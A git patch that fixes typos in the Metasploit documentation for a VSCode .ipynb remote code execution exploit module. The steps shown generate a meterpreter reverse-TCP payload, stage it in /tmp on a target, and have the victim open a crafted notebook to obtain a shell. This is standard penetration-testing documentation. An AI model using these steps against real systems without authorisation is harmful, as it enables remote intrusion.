From d7966104f2bfab668e204c04b2eee4585c1200de Mon Sep 17 00:00:00 2001 From: h00die Date: Tue, 4 Jun 2024 19:40:39 -0400 Subject: [PATCH] touchup docs --- .../exploit/multi/misc/vscode_ipynb_remote_dev_exec.md | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/documentation/modules/exploit/multi/misc/vscode_ipynb_remote_dev_exec.md b/documentation/modules/exploit/multi/misc/vscode_ipynb_remote_dev_exec.md index adbb70bbed6a..dfd2813a8f93 100644 --- a/documentation/modules/exploit/multi/misc/vscode_ipynb_remote_dev_exec.md +++ b/documentation/modules/exploit/multi/misc/vscode_ipynb_remote_dev_exec.md @@ -37,7 +37,7 @@ https://update.code.visualstudio.com/1.70.2/linux-deb-x64/stable 1. Start msfconsole 1. Do: `use linux/x64/meterpreter/reverse_tcp` 1. Do: `set lhost [ip]` and `set lport [port]` -1. Do: `geneate -o shell.sh -f elf` +1. Do: `generate -o shell.sh -f elf` 1. Copy the payload `shell.sh` to `/tmp/` on the target and run `chmod +x /tmp/shell.sh` 1. Do: `use modules/exploits/multi/misc/vscode_ipynb_remote_dev_exec` 1. Do: `set target 1 ` @@ -45,8 +45,8 @@ https://update.code.visualstudio.com/1.70.2/linux-deb-x64/stable 1. Do: `set FETCH_WRITABLE_DIR /tmp/` 1. Do: `set PAYLOAD_FILENAME shell.sh` 1. Do: `run` -1. Copy the ipynd payload file to the target machine. -1. In VSCode, open the URL (File -> Open -> project.ipynb) +1. Copy the ipynb, and payload file to the target machine. +1. In VSCode, open the file (File -> Open -> project.ipynb) 1. After the pop-up errors, open the file again. 1. You should get a shell.